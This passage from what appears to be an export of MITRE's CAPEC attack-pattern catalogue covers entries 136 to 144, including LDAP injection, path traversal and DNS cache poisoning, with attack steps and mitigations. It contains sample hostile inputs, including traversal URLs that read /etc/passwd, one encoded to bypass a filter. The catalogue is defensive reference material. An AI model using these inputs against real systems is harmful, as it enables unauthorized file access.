illegal formatting characters."]},"Example_Instances":{"Example":"Untrusted search path vulnerability in the add_filename_to_string function in intl/gettext/loadmsgcat.c for Elinks 0.11.1 allows local users to cause Elinks to use an untrusted gettext message catalog (.po file) in a \\"../po\\" directory, which can be leveraged to conduct format string attacks. See also: CVE-2007-2027"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"134"},{"CWE_ID":"20"},{"CWE_ID":"74"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Format string attack"}},"References":{"Reference":[{"External_Reference_ID":"REF-14"},{"External_Reference_ID":"REF-15","Section":"WASC-06 - Format String"},{"External_Reference_ID":"REF-616","Section":"Testing for Format String Injection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"136":{"ID":"136","Name":"LDAP Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey application] The attacker takes an inventory of the entry points of the application.","Technique":["Spider web sites for all available links","Sniff network communications with application using a utility such as WireShark."]},{"Step":"2","Phase":"Experiment","Description":"[Determine user-controllable input susceptible to LDAP injection] For each user-controllable input that the attacker suspects is vulnerable to LDAP injection, attempt to inject characters that have special meaning in LDAP (such as a single quote character, etc.). The goal is to create a LDAP query with an invalid syntax","Technique":["Use web browser to inject input through text fields or through HTTP GET parameters","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.","Use modified client (modified by reverse engineering) to inject input."]},{"Step":"3","Phase":"Experiment","Description":"[Try to exploit the LDAP injection vulnerability] After determining that a given input is vulnerable to LDAP Injection, hypothesize what the underlying query looks like. Possibly using a tool, iteratively try to add logic to the query to extract information from the LDAP, or to modify or delete information in the LDAP.","Technique":["Add logic to the LDAP query to change the meaning of that command. Automated tools could be used to generate the LDAP injection strings.","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header."]}]},"Prerequisites":{"Prerequisite":"The target application must accept a string as user input, fail to sanitize characters that have a special meaning in LDAP queries in the user input, and insert the user-supplied string in an LDAP query which is then processed."},"Skills_Required":{"Skill":["The attacker needs to have knowledge of LDAP, especially its query syntax.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content.","Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application."]},"Example_Instances":{"Example":"PowerDNS before 2.9.18, when running with an LDAP backend, does not properly escape LDAP queries, which allows remote attackers to cause a denial of service (failure to answer ldap questions) and possibly conduct an LDAP injection attack. See also: CVE-2005-2301"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"77"},{"CWE_ID":"90"},{"CWE_ID":"20"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"29","Entry_Name":"LDAP Injection"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"LDAP Injection"}]},"References":{"Reference":[{"External_Reference_ID":"REF-17","Section":"WASC-29 - LDAP Injection"},{"External_Reference_ID":"REF-608","Section":"Testing for LDAP Injection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"}]}},"137":{"ID":"137","Name":"Parameter Injection","Abstraction":"Meta","Status":"Stable","Description":"An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value \\"myInput&new_param=myValue\\", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":["The target application must use a parameter encoding where separators and parameter identifiers are expressed in regular text.","The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. The only requirement is the ability to provide string input to the target."},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Data","Note":"Successful parameter injection attacks mean a compromise to integrity of the application."}},"Mitigations":{"Mitigation":["Implement an audit log written to a separate host. In the event of a compromise, the audit log may be able to provide evidence and details of the compromise.","Treat all user input as untrusted data that must be validated before use."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"88"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Description, Related_Weaknesses"}]}},"138":{"ID":"138","Name":"Reflection Injection","Abstraction":"Standard","Status":"Draft","Description":"An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"137","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":["The target application must utilize reflection libraries and allow users to directly control the parameters to these methods. If the adversary can host classes where the target can invoke them, more powerful variants of this attack are possible.","The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"139":{"ID":"139","Name":"Relative Path Traversal","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \\\\) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target\'s directory structure.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"126"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Fingerprinting of the operating system] In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.","Technique":["Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.","TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey application] Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.","Technique":["Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore a website and analyze how it is constructed. Many browser plug-ins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"3","Phase":"Experiment","Description":"[Attempt variations on input parameters] Using manual or automated means, an adversary attempts varying relative file path combinations on all found user input locations and observes the responses.","Technique":["Provide \\"../\\" or \\"..\\\\\\" at the beginning of any filename to traverse to the parent directory","Use a list of probe strings as path traversal payload. Different strings may be used for different platforms. Strings contain relative path sequences such as \\"../\\".","Use a proxy tool to record results of manual input of relative path traversal probes in known URLs."]},{"Step":"4","Phase":"Exploit","Description":"[Access, modify, or execute arbitrary files.] An adversary injects path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.","Technique":["Manipulate file and its path by injecting relative path sequences (e.g. \\"../\\").","Download files, modify files, or try to execute shell commands (with binary files)."]}]},"Prerequisites":{"Prerequisite":"The target application must accept a string as user input, fail to sanitize combinations of characters in the input that have a special meaning in the context of path navigation, and insert the user-supplied string into path navigation commands."},"Skills_Required":{"Skill":["To inject the malicious payload in a web page",{"Level":"Low"},"To bypass non trivial filters in the application",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement","Implementation: Perform input validation for all remote content, including remote and user-generated content.","Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach.","Implementation: Prefer working without user input when using file system calls","Implementation: Use indirect references rather than actual file names.","Implementation: Use possible permissions on file access when developing and deploying web applications."]},"Example_Instances":{"Example":{"p":["The attacker uses relative path traversal to access files in the application. This is an example of accessing user\'s password file.","However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.","Then an attacker creates special payloads to bypass this filter:","When the application gets this input string, it will be the desired vector by the attacker."],"div":["http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd",{"style":"margin-left:10px;","class":"attack"},"http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"23"}},"References":{"Reference":[{"External_Reference_ID":"REF-9","Section":"Testing for Path Traversal (OWASP-AZ-001)"},{"External_Reference_ID":"REF-10","Section":"WASC-33 - Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"140":{"ID":"140","Name":"Bypassing of Intermediate Forms in Multiple-Form Sets","Abstraction":"Standard","Status":"Draft","Description":"Some web applications require users to submit information through an ordered sequence of web forms. This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"74","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"The target must collect information from the user in a series of forms where each form has its own URL that the attacker can anticipate and the application must fail to detect attempts to access intermediate forms without first filling out the previous forms."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"372"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"141":{"ID":"141","Name":"Cache Poisoning","Abstraction":"Standard","Status":"Draft","Description":"An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers\' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application\'s cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"161","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify and explore caches] Use tools to sniff traffic and scan a network in order to locate application\'s cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache) that may have vulnerabilities. Look for poisoning point in cache table entries.","Technique":"Run tools that check available entries in the cache."},{"Step":"2","Phase":"Experiment","Description":"[Cause specific data to be cached] An attacker sends bogus request to the target, and then floods responses that trick a cache to remember malicious responses, which are wrong answers of queries.","Technique":"Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID)."},{"Step":"3","Phase":"Exploit","Description":"[Redirect users to malicious website] As the attacker succeeds in exploiting the vulnerability, they are able to manipulate and interpose malicious response data to targeted victim queries.","Technique":["Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).","Adversary-in-the-Middle attacks (CAPEC-94) intercept secure communication between two parties."]}]},"Prerequisites":{"Prerequisite":["The attacker must be able to modify the value stored in a cache to match a desired value.","The targeted application must not be able to detect the illicit modification of the cache and must trust the cache value in its calculations."]},"Skills_Required":{"Skill":["To overwrite/modify targeted cache",{"Level":"Medium"}]},"Mitigations":{"Mitigation":["Configuration: Disable client side caching.","Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes."]},"Example_Instances":{"Example":{"div":["DNS cache poisoning example",{"style":"color:#32498D; font-weight:bold;"}],"p":["In this example, an attacker sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.","Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the attacker floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com","When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"348"},{"CWE_ID":"345"},{"CWE_ID":"349"},{"CWE_ID":"346"},{"CWE_ID":"441"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Cache Poisoning"}},"References":{"Reference":[{"External_Reference_ID":"REF-22","Section":"DNS Cache Poisoning"},{"External_Reference_ID":"REF-23","Section":"DNS Threats & Weaknesses of the Domain Name System"},{"External_Reference_ID":"REF-24","Section":"Arp Spoofing"},{"External_Reference_ID":"REF-599","Section":"Testing for Browser Cache Weaknesses"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Execution_Flow"}]}},"142":{"ID":"142","Name":"DNS Cache Poisoning","Abstraction":"Detailed","Status":"Draft","Description":"A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim\'s computer or to masquerade as part of a Pharming attack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"141"},{"Nature":"CanPrecede","CAPEC_ID":"89"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Explore resolver caches] Check DNS caches on local DNS server and client\'s browser with DNS cache enabled.","Technique":["Run tools that check the resolver cache in the memory to see if it contains a target DNS entry.","Figure out if the client\'s browser has DNS cache enabled."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt sending crafted records to DNS cache] A request is sent to the authoritative server for target website and wait for the iterative name resolver. An adversary sends bogus request to the DNS local server, and then floods responses that trick a DNS cache to remember malicious responses, which are wrong answers of DNS query.","Technique":["Adversary must know the transaction ID by intercepting a DNS query, or sending a bogus query with known transaction ID.","If the transaction ID used to identify each query instance is randomized in some new DNS software, the attack must guess the transaction ID. Slow the response of the real DNS server by causing Denial-of-service. This gives adversaries enough time to guess transaction","Adversary crafts DNS response with the same transaction ID as in the request. The adversary sends out DNS responses before the authorized DNS server. This forces DNS local cache stores fake DNS response (wrong answer). The fake DNS responses usually include a malicious website\'s IP address."]},{"Step":"3","Phase":"Exploit","Description":"[Redirect users to malicious website] As the adversary succeeds in exploiting the vulnerability, the victim connects to a malicious site using a good web site\'s domain name.","Technique":["Redirecting Web traffic to a site that looks enough like the original so as to not raise any suspicion.","Adversary-in-the-Middle (CAPEC-94) intercepts secure communication between two parties."]}]},"Prerequisites":{"Prerequisite":"A DNS cache must be vulnerable to some attack that allows the adversary to replace addresses in its lookup table.Client applications must trust the corrupted cashed values and utilize them for their domain name resolutions."},"Skills_Required":{"Skill":["To overwrite/modify targeted DNS cache",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The adversary must have the resources to modify the targeted cache. In addition, in most cases the adversary will wish to host the sites to which users will be redirected, although in some cases redirecting to a third party site will accomplish the adversary\'s goals."},"Mitigations":{"Mitigation":["Configuration: Make sure your DNS servers have been updated to the latest versions","Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet.","Configuration: Disable client side DNS caching."]},"Example_Instances":{"Example":{"p":["In this example, an adversary sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.","Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the adversary floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com","When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"348"},{"CWE_ID":"345"},{"CWE_ID":"349"},{"CWE_ID":"346"},{"CWE_ID":"441"},{"CWE_ID":"350"}]},"References":{"Reference":[{"External_Reference_ID":"REF-22","Section":"DNS Cache Poisoning"},{"External_Reference_ID":"REF-23","Section":"DNS Threats & Weaknesses of the Domain Name System"},{"External_Reference_ID":"REF-27"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact, Related_Vulnerabilities, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Execution_Flow"}]}},"143":{"ID":"143","Name":"Detect Unpublicized Web Pages","Abstraction":"Detailed","Status":"Draft","Description":"An adversary searches a targeted web site for web pages that have not been publicized. In doing this, the adversary may be able to gain access to information that the targeted site did not intend to make public.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find target web site] An adversary finds a target web site that they think may have unpublicized web pages"},{"Step":"2","Phase":"Explore","Description":"[Map the published web site] The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree","Technique":["Use Dirbuster to brute force directories and file names to find unpublicized pages","Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked"]},{"Step":"3","Phase":"Experiment","Description":"[Try to find weaknesses or information] The adversary will try to find weaknesses or information on the unpublicized pages that the targeted site did not intend to be public","Technique":["Manually analyze files or pages for information that could be useful in a further attack","Use a static analysis tool to find weaknesses in unpublished web pages"]},{"Step":"4","Phase":"Exploit","Description":"[Follow-up attack] Use any information or weaknesses found to carry out a follow-up attack"}]},"Prerequisites":{"Prerequisite":"The targeted web site must include pages within its published tree that are not connected to its tree of links. The sensitivity of the content of these pages determines the severity of this attack."},"Resources_Required":{"Resource":"Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common page locations from known paths."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"144":{"ID":"144","Name":"Detect Unpublicized Web Services","Abstraction":"Detailed","Status":"Draft","Description":"An adversary searches a targeted web site for web services that have not been publicized. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find target web site] An adversary finds a target web site that they think may have unpublicized web services"},{"Step":"2","Phase":"Explore","Description":"[Map the published web site] The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree","Technique":["Use Dirbuster to brute force directories and file names to find unpublicized web services","Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked"]},{"Step":"3","Phase":"Experiment","Description":"[Try to find weaknesses or information] The adversary will try to find weaknesses in the unpublicized services that the targeted site did not intend to be public","Technique":"Use Nikto to look for web service vulnerabilities"},{"Step":"4","Phase":"Exploit","Description":"[Follow-up attack] Use any information or weaknesses found to carry out a follow-up attack"}]},"Prerequisites":{"Prerequisite":"The targeted web site must include unpublished services within its web tree. The nature of these services determines the severity of this 